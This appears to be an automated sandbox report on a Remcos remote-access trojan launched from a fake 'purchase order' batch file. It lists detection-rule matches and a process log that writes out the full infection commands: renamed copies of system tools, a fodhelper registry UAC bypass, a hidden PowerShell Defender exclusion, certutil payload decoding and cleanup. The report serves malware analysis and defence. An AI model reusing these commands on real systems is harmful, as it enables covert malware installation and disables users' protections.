Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2107DB62		36_2_2107DB62
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21087BAF		36_2_21087BAF
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21087A46		36_2_21087A46
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21097D33		36_2_21097D33
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21073FCA		36_2_21073FCA
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21096FEA		36_2_21096FEA
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21086E0E		36_2_21086E0E
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21095E5E		36_2_21095E5E
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2109DE9D		36_2_2109DE9D

Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: String function: 029A4668 appears 244 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: String function: 029A6604 appears 32 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: String function: 21062093 appears 50 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: String function: 029A4470 appears 67 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: String function: 029A47D0 appears 771 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: String function: 21094770 appears 41 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: String function: 029B7B60 appears 45 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: String function: 21061E65 appears 34 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: String function: 21094E10 appears 54 times
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: String function: 028947D0 appears 522 times
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: String function: 02896604 appears 33 times
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: String function: 02894668 appears 154 times
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: String function: 1BA24E10 appears 54 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF789BD3448 appears 54 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF67DEEABFC appears 818 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF67DEF0D10 appears 181 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF67DF464A6 appears 173 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF67DECEB98 appears 93 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF67DE3D1C8 appears 41 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF67DEF7BAC appears 34 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF67DE6BC9C appears 280 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF67DF3F11C appears 37 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF67DF3F1B8 appears 183 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF67DEF7D70 appears 35 times
Source: C:\Users\Public\ger.exe	Code function: String function: 00007FF65588D3D0 appears 56 times

Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000026.00000002.2516862809.000000001B02B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.bank.troj.spyw.expl.evad.winCMD@68/35@11/6

Source: C:\Users\Public\alpha.exe

Code function: 4_2_00007FF789BC32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,

4_2_00007FF789BC32B0

Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF655883F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,		14_2_00007FF655883F5C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF1826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,		25_2_00007FF67DF1826C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA07952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		28_2_1BA07952
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21077952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		36_2_21077952

Source: C:\Users\Public\alpha.exe

Code function: 4_2_00007FF789BEFB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,

4_2_00007FF789BEFB54

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 28_2_1B9FF8FD CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,

28_2_1B9FF8FD

Source: C:\Users\Public\kn.exe

Code function: 25_2_00007FF67DE77EC0 CoCreateInstance,#357,#207,LocalFree,LocalFree,

25_2_00007FF67DE77EC0

Source: C:\Users\Public\kn.exe

Code function: 25_2_00007FF67DF43148 FindResourceExW,LoadResource,

25_2_00007FF67DF43148

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 28_2_1BA0AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,QueryServiceStatus,StartServiceW,

28_2_1BA0AB0D

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\alpha.exe

Jump to behavior

Source: C:\Users\Public\xkn.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
Source: C:\Users\Public\Libraries\sppsvc.pif	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-3A6IQD

Source: C:\Users\Public\xkn.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3ru4bzt.u0w.ps1

Jump to behavior

Source: C:\Users\Public\Libraries\sppsvc.pif	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\sppsvc.pif	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\Public\alpha.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
Source: C:\Users\Public\alpha.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")

Source: C:\Users\Public\xkn.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1956,i,11964562257046214624,14274192803590327640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Users\Public\xkn.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: unknown	Process created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\sppsvc.pif C:\Users\Public\Libraries\sppsvc.pif
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
Source: C:\Users\Public\Libraries\sppsvc.pif	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF
Source: unknown	Process created: C:\Users\Public\Libraries\Kpeyvroh.PIF "C:\Users\Public\Libraries\Kpeyvroh.PIF"
Source: unknown	Process created: C:\Users\Public\Libraries\Kpeyvroh.PIF "C:\Users\Public\Libraries\Kpeyvroh.PIF"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\sppsvc.pif C:\Users\Public\Libraries\sppsvc.pif			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S			Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe			Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe			Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1956,i,11964562257046214624,14274192803590327640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S			Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "			Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe			Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Users\Public\Libraries\sppsvc.pif	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF
